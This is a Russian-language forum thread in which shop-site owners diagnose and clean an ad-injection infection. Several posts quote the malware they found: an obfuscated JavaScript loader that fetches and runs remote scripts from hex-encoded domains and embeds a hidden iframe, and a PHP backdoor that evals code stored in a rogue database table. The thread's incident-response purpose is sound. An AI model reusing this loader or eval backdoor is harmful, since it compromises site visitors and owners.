[Помощь] СРОЧНО в cpt_maincontent - вставили вирусы - где копать?

не все так просто :)
разобрались с модератором нулледа (Для просмотра ссылки Войди или Зарегистрируйся) - спасибо ему за помощь!
Опишите пожалуйста, как удалось решить. На сайте тоже стала появляться всплывающая реклама, как вставили и где копать не понимаю... У некоторых посетителей антивирус ругается...
 
ищите изменения в файлах, я поиском по файлам проходился, а дальше вручную смотрел где и что вставлено
добрым программистам давали доступ? мне один товарищь сам постучался - услуги, брал дорого, потом начал вперед деньги просить - заплатил - так он совсем пропал - при этом вставил свою ерунду, как только удалил - снова объявился - давай говорит поработаем :)
 
ищите изменения в файлах, я поиском по файлам проходился, а дальше вручную смотрел где и что вставлено
добрым программистам давали доступ? мне один товарищь сам постучался - услуги, брал дорого, потом начал вперед деньги просить - заплатил - так он совсем пропал - при этом вставил свою ерунду, как только удалил - снова объявился - давай говорит поработаем :)
Все делали сами. Вредоносный код с всплывающими баннерами нашел в Базе данных 71 соответствие в таблице SC_products , вот прилагаю код, может кто -нибудь поможет или сталкивался... Как прописали и кто, непонятно :(
Код:
<p></p>
<script type="text/javascript">// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["6277393576706a64612e7275","393667743863796932373774682e7275"]'),e="",t="10029",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("имя нашего сайта")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
// ]]></script>
<p><iframe id="a1996667054" width="320" height="240" style="display: none;" src="https://bw95vpjda.ru/f.html"></iframe></p>
 
Если кому интересно, как вышли из ситуации. Вирус был не на сайте, а на ПК администраторов. При создании товара в браузере Firefox автоматически вставлялся код с iframe баннерной сети. Поиск и проверка на вирусы не давала результаты, т.к. товары и соответственно вредоносный код прописан в БД. Поиск в БД по вредоносной ссылке - и результат 180 совпадений. Вручную редактируем через админку "инфицированные" товары или в БД. Чистка ПК админов- и проблема решена.
 
Возможно кому-то пригодится:
Если у вас вставляется код sape (или еще acint.net) в maincontent проверьте 2 файла:
/kernel/includes/pear/PEAR.php
и
/published/SC/html/scripts/modules/test/class.test.php
На сколько я понял еще не должно быть файла
/published/SC/localization/wbsstyle.php
 
Такая же беда была - код отыскался в табличке Для просмотра ссылки Войди или Зарегистрируйся. В виде сессий был вредоносный код, который компилился через смарти. При авторизации реклама пропадала. Если выясню как попал в БД - дам знать.
 
Код вставки вредоноса в файлике /publised/SC/html/scripts/modules/test/class.test.php

Код:
    if (mysql_query("SELECT * FROM SC_session_groups")) {
                    $cpt_session_groups = db_query("SELECT _SESSION FROM SC_session_groups") or die(db_error());
               
                    if (isset($cpt_session_groups)) {
                            while ($_cpt = db_fetch_row($cpt_session_groups)) {
                                    global $session_groups;
                                    $session_groups = eval($_cpt['_SESSION']);
                                    }
                                }
                            } else    {
                        $session_groups = '';
                }
                print $session_groups;
 
Такая же беда была - код отыскался в табличке Для просмотра ссылки Войди или Зарегистрируйся. В виде сессий был вредоносный код, который компилился через смарти. При авторизации реклама пропадала. Если выясню как попал в БД - дам знать.
Правильно понимаю, этой таблицы в магазине быть не должно, можно полностью ее удалить?
 
Код вставки вредоноса в файлике /publised/SC/html/scripts/modules/test/class.test.php
У меня кода этого нет, видимо восстановил магазин до того момента как код внедрили. А вот табличка нашлась, так как базу я не восстанавливал.
У Вас давно реклама эта появилась? У меня первый раз еще в январе, а потом заметил пару недель назад.
 
в январском бэкапе нашел код в файле \published\SC\html\scripts\modules\news\class.newsmodule.php, так что видимо возможны варианты куда код вставляют, главное разобраться бы как это делают чтобы решить вопрос

if (mysql_query("SELECT * FROM SC_session_groups")) {
$cpt_session_groups = db_query("SELECT _SESSION FROM SC_session_groups") or die(db_error());
$cpt_session_groups = db_query("SELECT _SESSION FROM SC_session_groups") or die(db_error());
if (isset($cpt_session_groups)) {
while ($_cpt = db_fetch_row($cpt_session_groups)) {
global $session_groups;
$session_groups = eval($_cpt['_SESSION']);
$session_groups = '';
print $session_groups;
 
Назад
Сверху